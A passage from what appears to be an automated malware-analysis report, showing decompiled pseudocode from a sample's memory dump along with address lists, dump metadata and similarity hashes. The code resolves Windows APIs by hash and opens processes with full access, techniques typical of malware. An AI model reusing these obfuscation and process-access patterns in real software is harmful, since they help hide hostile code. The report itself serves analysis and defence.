				 *_t439 = __ecx + 8;
				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
				while(1) {
					_t392 =  *_t308;
					E1000B69C(_t439 + 0x24, _t392, 0x7fffffff);
					if(E1000F4F4(_t439 + 0x24) == 0) {
						goto L3;
					} else {
						_t308[0xc] = 0;
						E1000F678(_t439 + 0x24);
					}
					L63:
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					L65:
					if((_t407 | _t398) != 0) {
						L68:
						return _t407;
					}
					if( *(_t439 + 0x78) != 0x20) {
						E1001223C(0x5dc, _t392, _t407);
						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
						continue;
					}
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					goto L68;
					L3:
					__eflags = _t308[1];
					if(_t308[1] <= 0) {
						L21:
						__eflags =  *(_t439 + 0x20);
						if( *(_t439 + 0x20) <= 0) {
							L33:
							E1000F678(_t439 + 0x24);
							__eflags = _t308[0xc];
							if(_t308[0xc] == 0) {
								L46:
								 *((intOrPtr*)(_t439 + 8)) = 0;
								 *((intOrPtr*)(_t439 + 0xc)) = 0;
								E1000F5A8(_t439 + 0x14, 0);
								 *((intOrPtr*)(_t439 + 0x38)) = 0;
								 *(_t439 + 0x34) =  *_t308;
								E1000F5A8(_t439 + 0x40, 0);
								_t182 = 0x40;
								__eflags = _t308[7] - 0x40;
								_t183 =  <  ? _t308[7] : _t182;
								 *(_t439 + 0x74) = _t183;
								__eflags = _t183;
								if(_t183 <= 0) {
									L57:
									asm("movq xmm0, [0x1001b808]");
									asm("movq [esp+0x84], xmm0");
									_t406 = E1001303C(0xfe338407, 0x8a79536f);
									__eflags = _t406;
									if(_t406 == 0) {
										_t424 = 0;
										__eflags = 0;
										L61:
										__eflags = _t424 - 0x3f;
										if(_t424 <= 0x3f) {
											__eflags = _t424 << 2;
											_t308[0xc] =  *(E1000F4E0( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
											_t188 = E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
											_t407 = _t308[0xc];
											asm("cdq");
											_t308[0xd] =  *_t188;
											_t398 = _t392;
											E1000B608(_t439 + 0x34);
											E1000B608(_t439 + 8);
											goto L65;
										}
										L62:
										E1000B608(_t439 + 0x34);
										E1000B608(_t439 + 8);
										goto L63;
									}
									_t392 = E1000F4E0(_t439 + 0x14, 0);
									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
									_t133 = _t198 - 0x80; // -128
									_t199 = _t133;
									__eflags = _t199 - 0x3f;
									_t424 =  <=  ? _t199 : _t198;
									__eflags = _t424 - 0x102;
									if(_t424 == 0x102) {
										goto L62;
									}
									goto L61;
								}
								_t437 = 0;
								__eflags = 0;
								while(1) {
									E1000CAD0(_t439 + 0x4c);
									_t392 = 0;
									_t324 = _t439 + 0x4c;
									 *((char*)(_t324 + 4)) = 0;
									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
									__eflags = E1000C2C4(_t324);
									if(__eflags != 0) {
										break;
									}
									E1000F84C(_t439 + 0x14, E1000F4F0(_t439 + 0x10) + 4);
									 *((intOrPtr*)(E1000F4E0(_t439 + 0x14, E1000F4F0(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
									_t409 = E1001303C(0xfe338407, 0xa8c8a645);
									__eflags = _t409;
									if(_t409 == 0) {
										L51:
										_t392 =  *(_t439 + 0x68);
										__eflags = _t392;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t392 - 0xffffffff;
										if(__eflags != 0) {
											E1000F84C(_t439 + 0x40, E1000F4F0(_t439 + 0x3c) + 4);
											 *(E1000F4E0(_t439 + 0x40, E1000F4F0(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
											E1000CD68(_t439 + 0x4c, __eflags);
											_t437 = _t437 + 1;
											__eflags = _t437 -  *(_t439 + 0x74);
											if(_t437 <  *(_t439 + 0x74)) {
												continue;
											}
											_t411 = 0;
											__eflags = 0;
											do {
												E1000F4E0( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
												E1000F4E0(_t439 + 0x40, _t411 * 4);
												_t439 = _t439 + 0xffffffd8;
												asm("cdq");
												asm("pxor xmm5, xmm5");
												asm("movd xmm1, dword [ebp]");
												asm("movd xmm4, dword [edi]");
												asm("movd xmm0, edx");
												asm("cdq");
												asm("punpckldq xmm1, xmm0");
												asm("movq xmm2, [ebx+0x38]");
												asm("movq [esp], xmm1");
												asm("movd xmm3, edx");
												asm("punpckldq xmm4, xmm3");
												asm("movq [esp+0x8], xmm2");
												asm("movq [esp+0x10], xmm4");
												asm("movq [esp+0x18], xmm5");
												asm("movq [esp+0x20], xmm5");
												E1000AC8C(__eflags);
												_t411 = _t411 + 1;
												__eflags = _t411 -  *(_t439 + 0x74);
											} while (_t411 <  *(_t439 + 0x74));
											goto L57;
										}
										break;
									}
									_t392 = _t439 + 0x68;
									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
									__eflags = 0;
									if(0 != 0) {
										break;
									}
									goto L51;
								}
								E1000CD68(_t439 + 0x4c, __eflags);
								goto L62;
							}
							_t402 = _t308[1];
							__eflags = _t402;
							if(_t402 <= 0) {
								goto L46;
							}
							_t412 = 0;
							__eflags = 0;
							while(1) {
								_t429 = _t412 * 4;
								_t392 =  *(E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t429));
								__eflags = _t392 - _t308[0xd];
								if(_t392 == _t308[0xd]) {
									break;
								}
								_t412 = _t412 + 1;
								__eflags = _t412 - _t402;
								if(_t412 < _t402) {
									continue;
								}
								goto L46;
							}
							__eflags = _t412 - 0xffffffff;
							if(_t412 != 0xffffffff) {
								_t228 = E1000F4F0( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t228 - _t429;
								if(_t228 > _t429) {
									_t392 = 4 + _t412 * 4;
									 *(_t439 + 0x6c) = _t392;
									_t251 = E1000F4F0( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t251 -  *(_t439 + 0x6c);
									if(_t251 >  *(_t439 + 0x6c)) {
										 *((intOrPtr*)(_t439 + 0x90)) = E1000F4E0( *((intOrPtr*)(_t439 + 8)), _t429);
										 *((intOrPtr*)(_t439 + 0x8c)) = E1000F4E0( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
										E100138C8( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
										_t439 = _t439 + 0xc;
									}
									E1000F84C( *((intOrPtr*)(_t439 + 8)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t74 =  &(_t308[7]);
									 *_t74 = _t308[7] - 1;
									__eflags =  *_t74;
								}
								_t229 = E1000F4F0( *_t439);
								__eflags = _t229 - _t429;
								if(_t229 > _t429) {
									_t413 = 4 + _t412 * 4;
									_t242 = E1000F4F0( *_t439);
									__eflags = _t242 - _t413;
									if(_t242 > _t413) {
										_t243 = E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t429);
										 *((intOrPtr*)(_t439 + 0x94)) = E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t413);
										E100138C8(_t243,  *((intOrPtr*)(_t439 + 0x98)), E1000F4F0( *_t439) - _t413);
										_t439 = _t439 + 0xc;
									}
									E1000F84C( *((intOrPtr*)(_t439 + 4)), E1000F4F0( *_t439) + 0xfffffffc);
									_t79 =  &(_t308[1]);
									 *_t79 = _t308[1] - 1;
									__eflags =  *_t79;
								}
								E1000F84C( *((intOrPtr*)(_t439 + 8)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) + 4);
								 *(E1000F4E0( *((intOrPtr*)(_t439 + 8)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
								_t308[7] = _t308[7] + 1;
								E1000F84C( *((intOrPtr*)(_t439 + 4)), E1000F4F0( *_t439) + 4);
								 *(E1000F4E0( *((intOrPtr*)(_t439 + 4)), E1000F4F0( *_t439) + 0xfffffffc)) = _t308[0xd];
								_t308[1] = _t308[1] + 1;
							}
							goto L46;
						}
						_t433 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x70) = _t433 * 4;
							_t403 = E1000F4E0(_t439 + 0x28, _t433 * 4);
							_t392 = _t308[1];
							 *(_t439 + 0x80) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L29:
								_t414 = E1001303C(0x10154545, 0xc2a75cb8);
								__eflags = _t414;
								if(_t414 != 0) {
									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E1000F4E0(_t439 + 0x28,  *(_t439 + 0x70)))));
									__eflags = _t416;
									if(_t416 != 0) {
										E1000F84C( *((intOrPtr*)(_t439 + 8)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) + 4);
										 *(E1000F4E0( *((intOrPtr*)(_t439 + 8)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
										_t308[7] = _t308[7] + 1;
										_t271 = E1000F4E0(_t439 + 0x28,  *(_t439 + 0x70));
										E1000F84C( *((intOrPtr*)(_t439 + 4)), E1000F4F0( *_t439) + 4);
										 *(E1000F4E0( *((intOrPtr*)(_t439 + 4)), E1000F4F0( *_t439) + 0xfffffffc)) =  *_t271;
										_t57 =  &(_t308[1]);
										 *_t57 = _t308[1] + 1;
										__eflags =  *_t57;
									}
								}
								goto L32;
							}
							_t415 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
								__eflags = _t392 -  *_t403;
								if(_t392 ==  *_t403) {
									break;
								}
								_t415 = _t415 + 1;
								__eflags = _t415 -  *(_t439 + 0x80);
								if(_t415 <  *(_t439 + 0x80)) {
									continue;
								}
								goto L29;
							}
							__eflags = _t415 - 0xffffffff;
							if(_t415 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t433 = _t433 + 1;
							__eflags = _t433 -  *(_t439 + 0x20);
						} while (_t433 <  *(_t439 + 0x20));
						goto L33;
					} else {
						_t434 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x64) = _t434 * 4;
							_t404 = E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
							_t392 =  *(_t439 + 0x20);
							 *(_t439 + 0x7c) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L11:
								_t282 = E1000F4F0( *_t439);
								__eflags = _t282 -  *(_t439 + 0x64);
								if(_t282 >  *(_t439 + 0x64)) {
									_t420 = 4 + _t434 * 4;
									_t296 = E1000F4F0( *_t439);
									__eflags = _t296 - _t420;
									if(_t296 > _t420) {
										 *((intOrPtr*)(_t439 + 0x9c)) = E1000F4E0( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0x98)) = E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t420);
										E100138C8( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E1000F4F0( *_t439) - _t420);
										_t439 = _t439 + 0xc;
									}
									E1000F84C( *((intOrPtr*)(_t439 + 4)), E1000F4F0( *_t439) + 0xfffffffc);
									_t22 =  &(_t308[1]);
									 *_t22 = _t308[1] - 1;
									__eflags =  *_t22;
								}
								_t419 = E1001303C(0xfe338407, 0x77fa1d17);
								__eflags = _t419;
								if(_t419 != 0) {
									 *_t419( *((intOrPtr*)(E1000F4E0( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
								}
								_t284 = E1000F4F0( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t284 -  *(_t439 + 0x64);
								if(_t284 >  *(_t439 + 0x64)) {
									_t422 = 4 + _t434 * 4;
									_t285 = E1000F4F0( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t285 - _t422;
									if(_t285 > _t422) {
										 *((intOrPtr*)(_t439 + 0xa4)) = E1000F4E0( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0xa0)) = E1000F4E0( *((intOrPtr*)(_t439 + 8)), _t422);
										E100138C8( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) - _t422);
										_t439 = _t439 + 0xc;
									}
									E1000F84C( *((intOrPtr*)(_t439 + 8)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t33 =  &(_t308[7]);
									 *_t33 = _t308[7] - 1;
									__eflags =  *_t33;
								}
								_t434 = _t434 - 1;
								__eflags = _t434;
								goto L20;
							}
							_t421 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E1000F4E0(_t439 + 0x28, _t421 * 4));
								__eflags = _t392 -  *_t404;
								if(_t392 ==  *_t404) {
									break;
								}
								_t421 = _t421 + 1;
								__eflags = _t421 -  *(_t439 + 0x7c);
								if(_t421 <  *(_t439 + 0x7c)) {
									continue;
								}
								goto L11;
							}
							__eflags = _t421 - 0xffffffff;
							if(_t421 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t434 = _t434 + 1;
							__eflags = _t434 - _t308[1];
						} while (_t434 < _t308[1]);
						goto L21;
					}
				}
			}

0x1000a536
0x1000a538
0x1000a543
0x1000a549
0x1000a54d
0x1000a552
0x1000a558
0x1000a568
0x00000000
0x1000a56a
0x1000a56a
0x1000a575
0x1000a575
0x1000aaf3
0x1000aaf5
0x1000aaf6
0x1000ab35
0x1000ab39
0x1000ab47
0x1000ab55
0x1000ab55
0x1000ab40
0x1000ab5b
0x1000ab60
0x00000000
0x1000ab60
0x1000ab44
0x1000ab45
0x00000000
0x1000a57f
0x1000a57f
0x1000a583
0x1000a68a
0x1000a68a
0x1000a68f
0x1000a7a0
0x1000a7a4
0x1000a7a9
0x1000a7ad
0x1000a8d7
0x1000a8d9
0x1000a8dd
0x1000a8e6
0x1000a8ef
0x1000a8f3
0x1000a8fc
0x1000a903
0x1000a904
0x1000a908
0x1000a90c
0x1000a910
0x1000a912
0x1000aa7c
0x1000aa7c
0x1000aa84
0x1000aa9c
0x1000aa9e
0x1000aaa0
0x1000aada
0x1000aada
0x1000aadc
0x1000aadc
0x1000aadf
0x1000aafa
0x1000ab0e
0x1000ab11
0x1000ab16
0x1000ab21
0x1000ab22
0x1000ab25
0x1000ab27
0x1000ab30
0x00000000
0x1000ab30
0x1000aae1
0x1000aae5
0x1000aaee
0x00000000
0x1000aaee
0x1000aab1
0x1000aac1
0x1000aac5
0x1000aac5
0x1000aac8
0x1000aacb
0x1000aace
0x1000aad4
0x00000000
0x00000000
0x00000000
0x1000aad6
0x1000a91a
0x1000a91a
0x1000a91c
0x1000a920
0x1000a925
0x1000a927
0x1000a92b
0x1000a92e
0x1000a936
0x1000a938
0x00000000
0x00000000
0x1000a94f
0x1000a96a
0x1000a96c
0x1000a97f
0x1000a981
0x1000a983
0x1000a99e
0x1000a99e
0x1000a9a2
0x1000a9a4
0x00000000
0x00000000
0x1000a9a6
0x1000a9a9
0x1000a9ca
0x1000a9e9
0x1000a9ef
0x1000a9f2
0x1000a9f7
0x1000a9f8
0x1000a9fc
0x00000000
0x00000000
0x1000aa04
0x1000aa04
0x1000aa06
0x1000aa12
0x1000aa1e
0x1000aa28
0x1000aa2b
0x1000aa2e
0x1000aa32
0x1000aa39
0x1000aa3d
0x1000aa41
0x1000aa42
0x1000aa46
0x1000aa4b
0x1000aa50
0x1000aa54
0x1000aa58
0x1000aa5e
0x1000aa64
0x1000aa6a
0x1000aa70
0x1000aa75
0x1000aa76
0x1000aa76
0x00000000
0x1000aa06
0x00000000
0x1000a9a9
0x1000a987
0x1000a998
0x1000a99a
0x1000a99c
0x00000000
0x00000000
0x00000000
0x1000a99c
0x1000a9af
0x00000000
0x1000a9af
0x1000a7b3
0x1000a7b6
0x1000a7b8
0x00000000
0x00000000
0x1000a7c0
0x1000a7c0
0x1000a7c2
0x1000a7c2
0x1000a7d3
0x1000a7d5
0x1000a7d8
0x00000000
0x00000000
0x1000a8ce
0x1000a8cf
0x1000a8d1
0x00000000
0x00000000
0x00000000
0x1000a8d1
0x1000a7de
0x1000a7e1
0x1000a7eb
0x1000a7f0
0x1000a7f2
0x1000a7f8
0x1000a7ff
0x1000a803
0x1000a808
0x1000a80c
0x1000ac47
0x1000ac5b
0x1000ac7e
0x1000ac83
0x1000ac83
0x1000a823
0x1000a828
0x1000a828
0x1000a828
0x1000a828
0x1000a82e
0x1000a833
0x1000a835
0x1000a83a
0x1000a841
0x1000a846
0x1000a848
0x1000ac05
0x1000ac16
0x1000ac30
0x1000ac35
0x1000ac35
0x1000a85e
0x1000a863
0x1000a863
0x1000a863
0x1000a863
0x1000a877
0x1000a895
0x1000a89a
0x1000a8aa
0x1000a8c7
0x1000a8c9
0x1000a8c9
0x00000000
0x1000a7e1
0x1000a697
0x1000a697
0x1000a699
0x1000a6a0
0x1000a6ae
0x1000a6b0
0x1000a6b3
0x1000a6ba
0x1000a6bc
0x1000a6ed
0x1000a6fc
0x1000a6fe
0x1000a700
0x1000a71e
0x1000a720
0x1000a722
0x1000a735
0x1000a754
0x1000a75a
0x1000a75d
0x1000a774
0x1000a790
0x1000a792
0x1000a792
0x1000a792
0x1000a792
0x1000a722
0x00000000
0x1000a700
0x1000a6c0
0x1000a6c0
0x1000a6c2
0x1000a6d3
0x1000a6d5
0x1000a6d7
0x00000000
0x00000000
0x1000a6e3
0x1000a6e4
0x1000a6eb
0x00000000
0x00000000
0x00000000
0x1000a6eb
0x1000a6d9
0x1000a6dc
0x00000000
0x00000000
0x1000a795
0x1000a795
0x1000a796
0x1000a796
0x00000000
0x1000a589
0x1000a58b
0x1000a58b
0x1000a58d
0x1000a594
0x1000a5a2
0x1000a5a4
0x1000a5a8
0x1000a5ac
0x1000a5ae
0x1000a5dc
0x1000a5df
0x1000a5e4
0x1000a5e8
0x1000a5ed
0x1000a5f4
0x1000a5f9
0x1000a5fb
0x1000abc2
0x1000abd3
0x1000abf3
0x1000abf8
0x1000abf8
0x1000a611
0x1000a616
0x1000a616
0x1000a616
0x1000a616
0x1000a628
0x1000a62a
0x1000a62c
0x1000a63d
0x1000a63d
0x1000a643
0x1000a648
0x1000a64c
0x1000a652
0x1000a659
0x1000a65e
0x1000a660
0x1000ab76
0x1000ab87
0x1000aba8
0x1000abad
0x1000abad
0x1000a677
0x1000a67c
0x1000a67c
0x1000a67c
0x1000a67c
0x1000a67f
0x1000a67f
0x00000000
0x1000a67f
0x1000a5b2
0x1000a5b2
0x1000a5b4
0x1000a5c5
0x1000a5c7
0x1000a5c9
0x00000000
0x00000000
0x1000a5d5
0x1000a5d6
0x1000a5da
0x00000000
0x00000000
0x00000000
0x1000a5da
0x1000a5cb
0x1000a5ce
0x00000000
0x00000000
0x1000a680
0x1000a680
0x1000a681
0x1000a681
0x00000000
0x1000a58d
0x1000a583

Strings

, xrefs: 1000AB3B

Memory Dump Source

Source File: 00000004.00000002.326004095.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.325983786.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.326199252.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.326242722.000000001001D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.326285629.000000001001F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 8687b01a74f11d7250a7b8f4b415c733f3ae95b34e174124d48684709c87ac2b
Instruction ID: 00802be3918ea6aeb11fe45908ae931f8062d9273d37329102aa76dba10a21a3
Opcode Fuzzy Hash: 8687b01a74f11d7250a7b8f4b415c733f3ae95b34e174124d48684709c87ac2b
Instruction Fuzzy Hash: 60128C755082019FE714DF24C882A6FB7E5FFC5394F108A2DF899972AADB30AC45DB42

Uniqueness

Uniqueness Score: -1.00%

Function 1000846C, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E1000846C(signed int* __ecx, intOrPtr __edx, void* __eflags) {
				void* __esi;
				void* __ebp;
				signed int* _t173;
				signed int* _t178;
				void* _t180;
				void* _t181;
				intOrPtr* _t188;
				signed int _t202;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int* _t218;
				void* _t219;
				void* _t220;
				void* _t237;
				void* _t238;
				signed int* _t246;
				void* _t247;
				signed int* _t258;
				intOrPtr* _t269;
				signed int* _t277;
				intOrPtr* _t279;
				void* _t283;
				void* _t285;
				void* _t287;
				signed int* _t296;
				void* _t299;
				signed int* _t308;
				intOrPtr* _t310;
				signed int _t315;
				intOrPtr _t317;
				signed int* _t322;
				signed int _t323;
				signed int _t324;
				void* _t343;
				void* _t414;
				signed int _t415;
				signed int* _t421;
				signed int _t427;
				intOrPtr* _t428;
				intOrPtr* _t429;
				signed int _t431;
				signed int _t433;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t442;
				void* _t443;
				signed int _t444;
				void* _t445;
				signed int _t446;
				intOrPtr* _t449;

				 *_t449 = __ecx + 0x1c;
				 *((intOrPtr*)(_t449 + 0x68)) = __edx;
				 *(_t449 + 4) = __ecx;
				 *(_t449 + 0x84) = 0;
				 *((intOrPtr*)(_t449 + 0x78)) = __ecx + 4;
				while(1) {
					_t413 =  *(_t449 + 0x6c);
					E1000B69C(_t449 + 0x24,  *(_t449 + 0x6c), 0x7fffffff);
					if(E1000F4F4(_t449 + 0x24) == 0) {
						goto L3;
					} else {
						( *(_t449 + 4))[0xb] = 0;
						E1000F678(_t449 + 0x24);
					}
					L60:
					_t317 = 0xffffffffffffffff;
					L62:
					if(_t317 != 0) {
						L65:
						return _t317;
					}
					if( *(_t449 + 0x84) != 0x20) {
						E1001223C(0x5dc, _t413, _t430);
						 *(_t449 + 0x84) =  *(_t449 + 0x84) + 1;
						continue;
					}
					_t317 = 0xffffffffffffffff;
					goto L65;
					L3:
					__eflags =  *( *(_t449 + 4));
					if( *( *(_t449 + 4)) <= 0) {
						L21:
						__eflags =  *(_t449 + 0x20);
						if( *(_t449 + 0x20) <= 0) {
							L33:
							E1000F678(_t449 + 0x24);
							_t173 =  *(_t449 + 4);
							__eflags = _t173[0xb];
							if(_t173[0xb] == 0) {
								L46:
								 *((intOrPtr*)(_t449 + 8)) = 0;
								 *((intOrPtr*)(_t449 + 0xc)) = 0;
								E1000F5A8(_t449 + 0x14, 0);
								 *((intOrPtr*)(_t449 + 0x34)) =  *((intOrPtr*)(_t449 + 0x68));
								 *((intOrPtr*)(_t449 + 0x38)) = 0;
								E1000F5A8(_t449 + 0x40, 0);
								_t178 =  *(_t449 + 4);
								_t414 = 0x40;
								__eflags = _t178[6] - 0x40;
								_t415 =  <  ? _t178[6] : _t414;
								 *(_t449 + 0x80) = _t415;
								__eflags = _t415;
								if(_t415 <= 0) {
									L57:
									_t413 = E1000F4E0(_t449 + 0x14, 0);
									_t180 = E10012928( *((intOrPtr*)(_t449 + 0xc)), _t179, 0x3e8);
									_t132 = _t180 - 0x80; // -128
									_t181 = _t132;
									__eflags = _t181 - 0x3f;
									_t315 =  <=  ? _t181 : _t180;
									__eflags = _t315 - 0x102;
									if(_t315 == 0x102) {
										L59:
										E1000B608(_t449 + 0x34);
										E1000B608(_t449 + 8);
										goto L60;
									}
									__eflags = _t315 - 0x3f;
									if(_t315 <= 0x3f) {
										__eflags = _t315 << 2;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 8)) + 0x2c)) =  *((intOrPtr*)(E1000F4E0( *(_t449 + 4), _t315 << 2)));
										_t188 = E1000F4E0( *(_t449 + 0x7c), _t315 << 2);
										_t413 =  *(_t449 + 4);
										 *((intOrPtr*)(_t413 + 0x30)) =  *_t188;
										_t317 =  *((intOrPtr*)(_t413 + 0x2c));
										E1000B608(_t449 + 0x34);
										E1000B608(_t449 + 8);
										goto L62;
									}
									goto L59;
								}
								_t446 = 0;
								__eflags = 0;
								while(1) {
									E1000CAD0(_t449 + 0x4c);
									_t413 = 0;
									_t343 = _t449 + 0x4c;
									 *((char*)(_t343 + 4)) = 0;
									 *((intOrPtr*)(_t343 + 0x20)) = 0;
									__eflags = E1000C2C4(_t343);
									if(__eflags != 0) {
										break;
									}
									E1000F84C(_t449 + 0x14, E1000F4F0(_t449 + 0x10) + 4);
									 *((intOrPtr*)(E1000F4E0(_t449 + 0x14, E1000F4F0(_t449 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t449 + 0x4c));
									 *((intOrPtr*)(_t449 + 0xc)) =  *((intOrPtr*)(_t449 + 0xc)) + 1;
									_t202 = E1001303C(0xfe338407, 0xa8c8a645);
									__eflags = _t202;
									if(_t202 == 0) {
										L51:
										_t413 =  *(_t449 + 0x6c);
										__eflags = _t413;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t413 - 0xffffffff;
										if(__eflags != 0) {
											E1000F84C(_t449 + 0x40, E1000F4F0(_t449 + 0x3c) + 4);
											 *(E1000F4E0(_t449 + 0x40, E1000F4F0(_t449 + 0x3c) + 0xfffffffc)) =  *(_t449 + 0x6c);
											 *((intOrPtr*)(_t449 + 0x4c - 0x14)) =  *((intOrPtr*)(_t449 + 0x4c - 0x14)) + 1;
											E1000CD68(_t449 + 0x4c, __eflags);
											_t446 = _t446 + 1;
											__eflags = _t446 -  *(_t449 + 0x80);
											if(_t446 <  *(_t449 + 0x80)) {
												continue;
											}
											_t431 = 0;
											__eflags = 0;
											do {
												_t211 = E1000F4E0( *(_t449 + 4), _t431 * 4);
												_t212 = E1000F4E0(_t449 + 0x40, _t431 * 4);
												E10008B9C( *_t211, E100102D4(0xfe338407, 0x1a9c1df5),  *_t212, 0, 0);
												_t431 = _t431 + 1;
												__eflags = _t431 -  *(_t449 + 0x80);
											} while (_t431 <  *(_t449 + 0x80));
											goto L57;
										}
										break;
									}
									_t413 = 0;
									_push(2);
									_push(0);
									_push(0);
									_push(_t449 + 0x6c);
									_push( *((intOrPtr*)(_t449 + 0x78)));
									_push( *((intOrPtr*)(_t449 + 0x60)));
									_push(0xffffffff);
									asm("int3");
									asm("int3");
									__eflags = _t202;
									if(__eflags != 0) {
										break;
									}
									goto L51;
								}
								E1000CD68(_t449 + 0x4c, __eflags);
								goto L59;
							}
							_t427 =  *_t173;
							__eflags = _t427;
							if(_t427 <= 0) {
								goto L46;
							}
							_t430 = 0;
							__eflags = 0;
							_t322 =  &(_t173[1]);
							while(1) {
								_t433 = _t430 * 4;
								_t217 = E1000F4E0(_t322, _t433);
								_t218 =  *(_t449 + 4);
								__eflags =  *_t217 - _t218[0xc];
								if( *_t217 == _t218[0xc]) {
									break;
								}
								_t430 = _t430 + 1;
								__eflags = _t430 - _t427;
								if(_t430 < _t427) {
									continue;
								}
								goto L46;
							}
							__eflags = _t430 - 0xffffffff;
							if(_t430 != 0xffffffff) {
								_t219 = E1000F4F0( *_t449);
								__eflags = _t219 - _t433;
								if(_t219 > _t433) {
									 *((intOrPtr*)(_t449 + 0x74)) = 4 + _t430 * 4;
									_t247 = E1000F4F0( *_t449);
									__eflags = _t247 -  *((intOrPtr*)(_t449 + 0x74));
									if(_t247 >  *((intOrPtr*)(_t449 + 0x74))) {
										 *((intOrPtr*)(_t449 + 0x90)) = E1000F4E0( *(_t449 + 4), _t433);
										 *((intOrPtr*)(_t449 + 0x8c)) = E1000F4E0( *(_t449 + 4),  *((intOrPtr*)(_t449 + 0x74)));
										E100138C8( *((intOrPtr*)(_t449 + 0x98)),  *((intOrPtr*)(_t449 + 0x90)), E1000F4F0( *_t449) -  *((intOrPtr*)(_t449 + 0x74)));
										_t449 = _t449 + 0xc;
									}
									E1000F84C( *(_t449 + 4), E1000F4F0( *_t449) + 0xfffffffc);
									_t421 =  *(_t449 + 4);
									_t75 =  &(_t421[6]);
									 *_t75 = _t421[6] - 1;
									__eflags =  *_t75;
								}
								_t220 = E1000F4F0(_t322);
								__eflags = _t220 - _t433;
								if(_t220 > _t433) {
									_t430 = 4 + _t430 * 4;
									_t237 = E1000F4F0(_t322);
									__eflags = _t237 - _t430;
									if(_t237 > _t430) {
										_t238 = E1000F4E0(_t322, _t433);
										 *((intOrPtr*)(_t449 + 0x94)) = E1000F4E0(_t322, _t430);
										E100138C8(_t238,  *((intOrPtr*)(_t449 + 0x98)), E1000F4F0(_t322) - _t430);
										_t449 = _t449 + 0xc;
									}
									E1000F84C(_t322, E1000F4F0(_t322) + 0xfffffffc);
									_t246 =  *(_t449 + 4);
									 *_t246 =  *_t246 - 1;
									__eflags =  *_t246;
								}
								E1000F84C( *(_t449 + 4), E1000F4F0( *_t449) + 4);
								 *(E1000F4E0( *(_t449 + 4), E1000F4F0( *_t449) + 0xfffffffc)) = ( *(_t449 + 4))[0xb];
								( *(_t449 + 4))[6] = ( *(_t449 + 4))[6] + 1;
								E1000F84C(_t322, E1000F4F0(_t322) + 4);
								 *(E1000F4E0(_t322, E1000F4F0(_t322) + 0xfffffffc)) = ( *(_t449 + 4))[0xc];
								 *( *(_t449 + 4)) =  *( *(_t449 + 4)) + 1;
							}
							goto L46;
						}
						_t323 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x7c) = _t323 * 4;
